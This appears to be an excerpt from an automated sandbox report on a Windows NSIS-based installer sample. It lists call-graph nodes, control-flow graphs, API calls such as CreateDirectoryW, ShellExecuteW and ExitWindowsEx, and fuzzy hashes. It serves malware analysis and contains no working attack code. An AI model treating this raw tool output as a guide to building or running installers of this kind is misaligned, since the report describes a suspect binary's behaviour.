3473->3474 3476 406701 RemoveDirectoryW 3474->3476 3475->3459 3477 40672b 3476->3477 3478 40670c 3476->3478 3480 404a73 25 API calls 3477->3480 3482 404a73 25 API calls 3478->3482 3478->3488 3480->3488 3481 4066ab FindNextFileW 3483 4066c3 FindClose 3481->3483 3481->3491 3484 40671a 3482->3484 3483->3475 3485 406526 42 API calls 3484->3485 3485->3488 3487 406559 63 API calls 3487->3491 3488->3178 3488->3179 3490 404a73 25 API calls 3490->3481 3491->3472 3491->3481 3491->3487 3491->3490 3492 404a73 25 API calls 3491->3492 3493 406526 42 API calls 3491->3493 3495 405ab8 lstrcpynW 3491->3495 3496 4058de GetFileAttributesW 3491->3496 3492->3491 3493->3491 3494->3461 3495->3491 3497 4058fb DeleteFileW 3496->3497 3498 4058ed SetFileAttributesW 3496->3498 3497->3491 3498->3497 3500 405bb9 3499->3500 3501 405bae FindClose 3499->3501 3500->3471 3500->3488 3501->3500 3502->3334 3504 405824 3503->3504 3506 405836 3503->3506 3505 405831 CharNextW 3504->3505 3504->3506 3508 40585a 3505->3508 3507 4057b3 CharNextW 3506->3507 3506->3508 3507->3506 3508->3337 3508->3344 3510 406380 3509->3510 3511 4063a9 GetShortPathNameW 3509->3511 3535 4058fe GetFileAttributesW CreateFileW 3510->3535 3513 406520 3511->3513 3514 4063c2 3511->3514 3513->3355 3514->3513 3516 4063ca WideCharToMultiByte 3514->3516 3515 406389 CloseHandle GetShortPathNameW 3515->3513 3517 4063a1 3515->3517 3516->3513 3518 4063e7 WideCharToMultiByte 3516->3518 3517->3511 3517->3513 3518->3513 3519 4063ff wsprintfA 3518->3519 3520 4060ca 18 API calls 3519->3520 3521 40642b 3520->3521 3536 4058fe GetFileAttributesW CreateFileW 3521->3536 3523 406438 3523->3513 3524 406445 GetFileSize GlobalAlloc 3523->3524 3525 406516 CloseHandle 3524->3525 3526 406466 ReadFile 3524->3526 3525->3513 3526->3525 3527 406480 3526->3527 3527->3525 3537 405864 lstrlenA 3527->3537 3530 406499 lstrcpyA 3533 4064bb 3530->3533 3531 4064ad 3532 405864 4 API calls 3531->3532 3532->3533 3534 4064ee SetFilePointer WriteFile GlobalFree 3533->3534 3534->3525 3535->3515 3536->3523 3538 4058a5 lstrlenA 3537->3538 3539 4058ad 3538->3539 3540 40587e lstrcmpiA 3538->3540 3539->3530 3539->3531 3540->3539 3541 40589c CharNextA 3540->3541 3541->3538 4343 402218 4344 40145c 18 API calls 4343->4344 4345 402220 4344->4345 4346 40145c 18 API calls 4345->4346 4347 40222b 4346->4347 4348 40145c 18 API calls 4347->4348 4349 402235 4348->4349 4350 40145c 18 API calls 4349->4350 4351 402240 4350->4351 4352 40145c 18 API calls 4351->4352 4354 40224b 4352->4354 4353 402260 CoCreateInstance 4356 402280 4353->4356 4354->4353 4355 40145c 18 API calls 4354->4355 4355->4353 4357 402c18 SendMessageW 4358 402c34 InvalidateRect 4357->4358 4359 402c58 4357->4359 4358->4359 3591 401f9b 3592 40145c 18 API calls 3591->3592 3593 401fa2 3592->3593 3594 40145c 18 API calls 3593->3594 3595 401fac 3594->3595 3596 40145c 18 API calls 3595->3596 3597 401fb7 3596->3597 3598 40145c 18 API calls 3597->3598 3599 401fc1 3598->3599 3603 401435 3599->3603 3602 401ff9 3604 404a73 25 API calls 3603->3604 3605 401443 ShellExecuteW 3604->3605 3605->3602 3606 40139b 3608 4013a2 3606->3608 3607 401410 3608->3607 3609 4013dd MulDiv SendMessageW 3608->3609 3609->3608 4360 401c1c 4361 401446 18 API calls 4360->4361 4362 401c26 4361->4362 4363 401446 18 API calls 4362->4363 4364 401c30 4363->4364 4367 4059ff wsprintfW 4364->4367 4366 402c58 4367->4366 4368 403c1f 4369 403c3a 4368->4369 4377 403d67 4368->4377 4373 403c74 4369->4373 4399 403b31 WideCharToMultiByte 4369->4399 4370 403dd2 4371 403ea4 4370->4371 4372 403ddc GetDlgItem 4370->4372 4378 403952 8 API calls 4371->4378 4374 403e65 4372->4374 4375 403df6 4372->4375 4380 4038c7 19 API calls 4373->4380 4374->4371 4383 403e77 4374->4383 4375->4374 4382 403e1c 6 API calls 4375->4382 4377->4370 4377->4371 4379 403da3 GetDlgItem SendMessageW 4377->4379 4381 403e9f 4378->4381 4404 40390d EnableWindow 4379->4404 4385 403cb4 4380->4385 4382->4374 4387 403e8d 4383->4387 4388 403e7d SendMessageW 4383->4388 4386 4038c7 19 API calls 4385->4386 4390 403cc1 CheckDlgButton 4386->4390 4387->4381 4391 403e93 SendMessageW 4387->4391 4388->4387 4389 403dcd 4392 4038e9 SendMessageW 4389->4392 4402 40390d EnableWindow 4390->4402 4391->4381 4392->4370 4394 403cdf GetDlgItem 4403 403920 SendMessageW 4394->4403 4396 403cf5 SendMessageW 4397 403d12 GetSysColor 4396->4397 4398 403d1b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4396->4398 4397->4398 4398->4381 4400 403b50 GlobalAlloc WideCharToMultiByte 4399->4400 4401 403b6e 4399->4401 4400->4401 4401->4373 4402->4394 4403->4396 4404->4389 4405 401ba0 4406 40145c 18 API calls 4405->4406 4407 401ba8 ExpandEnvironmentStringsW 4406->4407 4408 401bbb 4407->4408 4410 401bcd 4407->4410 4409 401bc1 lstrcmpW 4408->4409 4408->4410 4409->4410 4411 401822 4412 40145c 18 API calls 4411->4412 4413 401829 GetFullPathNameW 4412->4413 4416 401840 4413->4416 4420 401863 4413->4420 4414 402c58 4415 40187b GetShortPathNameW 4415->4414 4417 405b98 2 API calls 4416->4417 4416->4420 4418 401853 4417->4418 4418->4420 4421 405ab8 lstrcpynW 4418->4421 4420->4414 4420->4415 4421->4420 4422 401625 4423 40162b 4422->4423 4424 40139b 2 API calls 4423->4424 4425 401634 4424->4425 4426 401ca6 4427 40145c 18 API calls 4426->4427 4428 401cae 4427->4428 4429 401446 18 API calls 4428->4429 4430 401cb8 wsprintfW 4429->4430 4431 402c58 4430->4431 4432 4028ab 4433 401446 18 API calls 4432->4433 4435 4028b5 4433->4435 4434 402838 4435->4434 4436 4028ee ReadFile 4435->4436 4437 402946 4435->4437 4436->4434 4436->4435 4437->4434 4438 401446 18 API calls 4437->4438 4439 40298e 4438->4439 4440 402995 SetFilePointer 4439->4440 4440->4434 4441 4029a6 4440->4441 4443 4059ff wsprintfW 4441->4443 4443->4434 3614 40172d 3615 40145c 18 API calls 3614->3615 3616 401735 3615->3616 3617 405807 4 API calls 3616->3617 3627 40173d 3617->3627 3618 401786 3619 4017aa 3618->3619 3620 40178c 3618->3620 3626 401435 25 API calls 3619->3626 3623 401435 25 API calls 3620->3623 3621 4057b3 CharNextW 3622 40174b CreateDirectoryW 3621->3622 3624 401761 GetLastError 3622->3624 3622->3627 3625 401793 3623->3625 3624->3627 3628 40176e GetFileAttributesW 3624->3628 3632 405ab8 lstrcpynW 3625->3632 3631 4017b1 3626->3631 3627->3618 3627->3621 3628->3627 3630 40179e SetCurrentDirectoryW 3630->3631 3632->3630 4444 4026ae 4445 4026bc 4444->4445 4446 4026bd CloseHandle 4445->4446 4447 402c58 4446->4447 4448 402a2f 4449 40145c 18 API calls 4448->4449 4450 402a3c 4449->4450 4451 402a53 4450->4451 4452 40145c 18 API calls 4450->4452 4453 4058de 2 API calls 4451->4453 4452->4451 4454 402a59 4453->4454 4474 4058fe GetFileAttributesW CreateFileW 4454->4474 4456 402a66 4457 402a72 GlobalAlloc 4456->4457 4458 402b0f 4456->4458 4459 402b06 CloseHandle 4457->4459 4460 402a8b 4457->4460 4461 402b16 DeleteFileW 4458->4461 4462 402b29 4458->4462 4459->4458 4475 402ed0 SetFilePointer 4460->4475 4461->4462 4464 402a92 4465 402e9e ReadFile 4464->4465 4466 402a9b GlobalAlloc 4465->4466 4467 402aab 4466->4467 4468 402add WriteFile GlobalFree 4466->4468 4469 402ee7 33 API calls 4467->4469 4470 402ee7 33 API calls 4468->4470 4473 402ab9 4469->4473 4471 402b04 4470->4471 4471->4459 4472 402ad4 GlobalFree 4472->4468 4473->4472 4474->4456 4475->4464 4476 402b2f 4477 401446 18 API calls 4476->4477 4478 402b36 4477->4478 4479 401721 4478->4479 4480 402b85 4478->4480 4481 402b78 4478->4481 4483 4060ca 18 API calls 4480->4483 4482 401446 18 API calls 4481->4482 4482->4479 4483->4479 4484 4020af 4485 40145c 18 API calls 4484->4485 4486 4020b7 GetFileVersionInfoSizeW 4485->4486 4487 4020dd GlobalAlloc 4486->4487 4489 402c58 4486->4489 4488 4020f1 GetFileVersionInfoW 4487->4488 4487->4489 4490 402101 VerQueryValueW 4488->4490 4491 402132 GlobalFree 4488->4491 4490->4491 4492 40211a 4490->4492 4491->4489 4497 4059ff wsprintfW 4492->4497 4495 402126 4498 4059ff wsprintfW 4495->4498 4497->4495 4498->4491 4499 4029af 4503 405a18 4499->4503 4502 402c58 4504 4029bd FindClose 4503->4504 4504->4502 4505 402db4 4506 402dc6 SetTimer 4505->4506 4507 402ddf 4505->4507 4506->4507 4508 402e34 4507->4508 4509 402df9 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4507->4509 4509->4508 4510 404bb4 4511 404d61 4510->4511 4512 404bd5 GetDlgItem GetDlgItem GetDlgItem 4510->4512 4513 404d6a GetDlgItem CreateThread CloseHandle 4511->4513 4517 404d92 4511->4517 4556 403920 SendMessageW 4512->4556 4513->4517 4515 404c49 4521 404c50 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4515->4521 4516 404dc0 4520 404e1e 4516->4520 4523 404dd1 4516->4523 4524 404df7 ShowWindow 4516->4524 4517->4516 4518 404de2 4517->4518 4519 404dac ShowWindow ShowWindow 4517->4519 4525 403952 8 API calls 4518->4525 4558 403920 SendMessageW 4519->4558 4520->4518 4528 404e29 SendMessageW 4520->4528 4526 404ca3 SendMessageW SendMessageW 4521->4526 4527 404cbf 4521->4527 4529 4038a0 SendMessageW 4523->4529 4531 404e17 4524->4531 4532 404e09 4524->4532 4530 404d5a 4525->4530 4526->4527 4535 404cd2 4527->4535 4536 404cc4 SendMessageW 4527->4536 4528->4530 4537 404e42 CreatePopupMenu 4528->4537 4529->4518 4534 4038a0 SendMessageW 4531->4534 4533 404a73 25 API calls 4532->4533 4533->4531 4534->4520 4538 4038c7 19 API calls 4535->4538 4536->4535 4539 4060ca 18 API calls 4537->4539 4540 404ce2 4538->4540 4541 404e52 AppendMenuW 4539->4541 4542 404ceb ShowWindow 4540->4542 4543 404d1f GetDlgItem SendMessageW 4540->4543 4544 404e65 GetWindowRect 4541->4544 4545 404e78 4541->4545 4546 404d01 ShowWindow 4542->4546 4547 404d0e 4542->4547 4543->4530 4549 404d42 SendMessageW SendMessageW 4543->4549 4548 404e7f TrackPopupMenu 4544->4548 4545->4548 4546->4547 4557 403920 SendMessageW 4547->4557 4548->4530 4550 404e9d 4548->4550 4549->4530 4552 404eb9 SendMessageW 4550->4552 4552->4552 4553 404ed6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4552->4553 4554 404efb SendMessageW 4553->4554 4554->4554 4555 404f26 GlobalUnlock SetClipboardData CloseClipboard 4554->4555 4555->4530 4556->4515 4557->4543 4558->4516 4559 4017b6 4560 40145c 18 API calls 4559->4560 4561 4017bd 4560->4561 4562 405b98 2 API calls 4561->4562 4563 4017c3 4562->4563 4564 402bb6 4565 401446 18 API calls 4564->4565 4566 402bbd 4565->4566 4567 4060ca 18 API calls 4566->4567 4568 401721 4566->4568 4567->4568 4569 401639 4570 404a73 25 API calls 4569->4570 4571 401641 4570->4571 4572 40243c 4573 40145c 18 API calls 4572->4573 4574 402454 4573->4574 4575 40145c 18 API calls 4574->4575 4576 40245e 4575->4576 4577 40145c 18 API calls 4576->4577 4578 402469 GetPrivateProfileStringW lstrcmpW 4577->4578

                                              Executed Functions

                                              Function 00403415 Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 307filestringcomCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 403415-4034ab #17 SetErrorMode OleInitialize call 405bbf SHGetFileInfoW call 405ab8 GetCommandLineW call 405ab8 GetModuleHandleW 7 4034b5-4034c9 call 4057b3 CharNextW 0->7 8 4034ad-4034b0 0->8 11 40355a-403560 7->11 8->7 12 403566 11->12 13 4034ce-4034d4 11->13 14 403585-40359d GetTempPathW call 403360 12->14 15 4034d6-4034db 13->15 16 4034dd-4034e1 13->16 25 4035c3-4035dd DeleteFileW call 40311b 14->25 26 40359f-4035bd GetWindowsDirectoryW lstrcatW call 403360 14->26 15->15 15->16 18 4034e3-4034e7 16->18 19 4034e8-4034ec 16->19 18->19 20 403549-403556 call 4057b3 19->20 21 4034ee-4034f4 19->21 20->11 34 403558-403559 20->34 23 4034f6-4034fe 21->23 24 40350a-40351c call 403394 21->24 28 403500-403503 23->28 29 403505 23->29 40 403532-403547 call 403394 24->40 41 40351e-403526 24->41 38 403654-403663 call 4033eb OleUninitialize 25->38 39 4035df-4035e5 25->39 26->25 26->38 28->24 28->29 29->24 34->11 54 403756-40375c 38->54 55 403669-403679 call 40574d ExitProcess 38->55 42 403644-40364b call 4053f8 39->42 43 4035e7-4035f0 call 4057b3 39->43 40->20 56 403568-403580 call 4076da call 405ab8 40->56 45 403528-40352b 41->45 46 40352d 41->46 53 403650 42->53 57 403608-40360a 43->57 45->40 45->46 46->40 53->38 59 4037d9-4037e1 54->59 60 40375e-40377b call 405bbf * 3 54->60 56->14 64 4035f2-403604 call 403394 57->64 65 40360c-403616 57->65 66 4037e3 59->66 67 4037e7 59->67 91 4037c5-4037d0 ExitWindowsEx 60->91 92 40377d-40377f 60->92 64->65 78 403606-403607 64->78 72 403618-403628 call 406042 65->72 73 40367f-403699 lstrcatW lstrcmpiW 65->73 66->67 72->38 85 40362a-403640 call 405ab8 * 2 72->85 73->38 77 40369b-4036b1 CreateDirectoryW SetCurrentDirectoryW 73->77 81 4036b3-4036b9 call 405ab8 77->81 82 4036be-4036de call 405ab8 * 2 77->82 78->57 81->82 99 4036e3-4036ff call 4060ca DeleteFileW 82->99 85->42 91->59 96 4037d2-4037d4 call 40141d 91->96 92->91 97 403781-403783 92->97 96->59 97->91 101 403785-403797 GetCurrentProcess 97->101 106 403740-403748 99->106 107 403701-403711 CopyFileW 99->107 101->91 105 403799-4037bb 101->105 105->91 106->99 108 40374a-403751 call 406526 106->108 107->106 109 403713-403733 call 406526 call 4060ca call 4056ec 107->109 108->38 109->106 119 403735-40373c CloseHandle 109->119 119->106
                                              APIs
                                              • #17.COMCTL32 ref: 00403434
                                              • SetErrorMode.KERNELBASE(00008001), ref: 0040343F
                                              • OleInitialize.OLE32(00000000), ref: 00403446
                                                • Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                                                • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                                                • Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                                              • SHGetFileInfoW.SHELL32(0040856C,00000000,?,000002B4,00000000), ref: 0040346E
                                                • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                                              • GetCommandLineW.KERNEL32(004732A0,NSIS Error), ref: 00403483
                                              • GetModuleHandleW.KERNEL32(00000000,004CC0A0,00000000), ref: 00403496
                                              • CharNextW.USER32(00000000,004CC0A0,00000020), ref: 004034BD
                                              • GetTempPathW.KERNEL32(00002004,004E00C8,00000000,00000020), ref: 00403590
                                              • GetWindowsDirectoryW.KERNEL32(004E00C8,00001FFF), ref: 004035A5
                                              • lstrcatW.KERNEL32(004E00C8,\Temp), ref: 004035B1
                                              • DeleteFileW.KERNELBASE(004DC0C0), ref: 004035C8
                                              • OleUninitialize.OLE32(?), ref: 00403659
                                              • ExitProcess.KERNEL32 ref: 00403679
                                              • lstrcatW.KERNEL32(004E00C8,~nsu.tmp), ref: 00403685
                                              • lstrcmpiW.KERNEL32(004E00C8,004D80B8,004E00C8,~nsu.tmp), ref: 00403691
                                              • CreateDirectoryW.KERNEL32(004E00C8,00000000), ref: 0040369D
                                              • SetCurrentDirectoryW.KERNEL32(004E00C8), ref: 004036A4
                                              • DeleteFileW.KERNEL32(0043BD40,0043BD40,?,00480008,0040850C,0047C000,?), ref: 004036F5
                                              • CopyFileW.KERNEL32(004E80D8,0043BD40,00000001), ref: 00403709
                                              • CloseHandle.KERNEL32(00000000,0043BD40,0043BD40,?,0043BD40,00000000), ref: 00403736
                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 0040378C
                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004037C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                              • API String ID: 2435955865-3712954417
                                              • Opcode ID: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
                                              • Instruction ID: 24a773ffd11e725b17f64a587af86d00896606ebd673f2b671a94fa35e787169
                                              • Opcode Fuzzy Hash: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
                                              • Instruction Fuzzy Hash: BBA1E670500701BBD6207F629D4AB1B7E9CEB01705F10483FF985B62D2DBBD9A458BAE
                                              Function 00405B98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 415 405b98-405bac FindFirstFileW 416 405bb9 415->416 417 405bae-405bb7 FindClose 415->417 418 405bbb-405bbc 416->418 417->418
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00464A20,0045FE18,00406093,0045FE18), ref: 00405BA3
                                              • FindClose.KERNEL32(00000000), ref: 00405BAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: JF
                                              • API String ID: 2295610775-1378213080
                                              • Opcode ID: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
                                              • Instruction ID: 1ee526d225bc4302f24aa9e13179370b3debcda52a21c952381bfba9845ea930
                                              • Opcode Fuzzy Hash: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
                                              • Instruction Fuzzy Hash: 51D022301095206FC60003386D0C88B3A28EF0A3303104B32F1A5F22E0C7B4AC638A9C
                                              Function 00405BBF Relevance: 4.5, APIs: 3, Instructions: 19libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 419 405bbf-405bd7 GetModuleHandleA 420 405be4-405beb GetProcAddress 419->420 421 405bd9-405be2 LoadLibraryA 419->421 422 405bf1-405bf3 420->422 421->420 421->422
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                                              • LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: AddressHandleLibraryLoadModuleProc
                                              • String ID:
                                              • API String ID: 310444273-0
                                              • Opcode ID: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
                                              • Instruction ID: e5a37bd0471b14276c9a44c6b696aa1abbb9d0f0bd66a2a471ce49017894d203
                                              • Opcode Fuzzy Hash: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
                                              • Instruction Fuzzy Hash: 9DE08C32600A1297DA101B609E0896B777CAB89640302C43EF545B2011DB34B825ABAD
                                              Function 004053F8 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 227stringregistrylibraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 120 4053f8-405412 call 405bbf 123 405414-405424 call 4059ff 120->123 124 405426-40545e call 405981 120->124 133 405481-4054a9 call 4039fc call 406042 123->133 129 405460-405471 call 405981 124->129 130 405476-40547c lstrcatW 124->130 129->130 130->133 138 405543-405550 call 406042 133->138 139 4054af-4054b4 133->139 145 405552-405559 call 4060ca 138->145 146 40555e-405583 LoadImageW 138->146 139->138 140 4054ba-4054e2 call 405981 139->140 140->138 147 4054e4-4054e8 140->147 145->146 149 405613-40561b call 40141d 146->149 150 405589-4055c8 RegisterClassW 146->150 151 4054ea-4054fb call 4057b3 147->151 152 4054fe-40550a lstrlenW 147->152 163 405625-405630 call 4039fc 149->163 164 40561d-405620 149->164 153 4056e5 150->153 154 4055ce-40560e SystemParametersInfoW CreateWindowExW 150->154 151->152 158 405532-40553e call 405fe6 call 405ab8 152->158 159 40550c-40551a lstrcmpiW 152->159 156 4056e7-4056eb 153->156 154->149 158->138 159->158 162 40551c-405526 GetFileAttributesW 159->162 167 405528-40552a 162->167 168 40552c-40552d call 406015 162->168 173 405636-405653 ShowWindow LoadLibraryW 163->173 174 4056bc-4056c4 call 404b48 163->174 164->156 167->158 167->168 168->158 175 405655-40565a LoadLibraryW 173->175 176 40565c-40566d GetClassInfoW 173->176 182 4056c6-4056cc 174->182 183 4056de-4056e0 call 40141d 174->183 175->176 178 405689-4056ba DialogBoxParamW call 40141d call 4037f0 176->178 179 40566f-405683 GetClassInfoW RegisterClassW 176->179 178->156 179->178 182->164 186 4056d2-4056d9 call 40141d 182->186 183->153 186->164
                                              APIs
                                                • Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                                                • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                                                • Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                                              • lstrcatW.KERNEL32(004DC0C0,0044FD98), ref: 0040547C
                                              • lstrlenW.KERNEL32(%AtlasTreasures%,?,?,?,%AtlasTreasures%,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000,00000006,004CC0A0), ref: 004054FF
                                              • lstrcmpiW.KERNEL32(?,.exe,%AtlasTreasures%,?,?,?,%AtlasTreasures%,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000), ref: 00405512
                                              • GetFileAttributesW.KERNEL32(%AtlasTreasures%), ref: 0040551D
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D00A8), ref: 0040556F
                                                • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                                              • RegisterClassW.USER32(00473240), ref: 004055BF
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004055D6
                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00405608
                                                • Part of subcall function 004039FC: SetWindowTextW.USER32(00000000,004732A0), ref: 00403A97
                                              • ShowWindow.USER32(00000005,00000000), ref: 0040563E
                                              • LoadLibraryW.KERNEL32(RichEd20), ref: 0040564F
                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 0040565A
                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00473240), ref: 00405669
                                              • GetClassInfoW.USER32(00000000,RichEdit,00473240), ref: 00405676
                                              • RegisterClassW.USER32(00473240), ref: 00405683
                                              • DialogBoxParamW.USER32(?,00000000,00404F45,00000000), ref: 004056A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: %AtlasTreasures%$.DEFAULT\Control Panel\International$.exe$@2G$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                              • API String ID: 608394941-506693491
                                              • Opcode ID: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
                                              • Instruction ID: 3004e29146ce1891a10f4484e48a0599eb6fbea5d6fbf796412b55f756561b6a
                                              • Opcode Fuzzy Hash: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
                                              • Instruction Fuzzy Hash: 7F7104B0601A11BED710ABA5AD46F6F366CEB44304F40043BF949B62E2DB794D818FAD
                                              Function 00402EE7 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 175fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
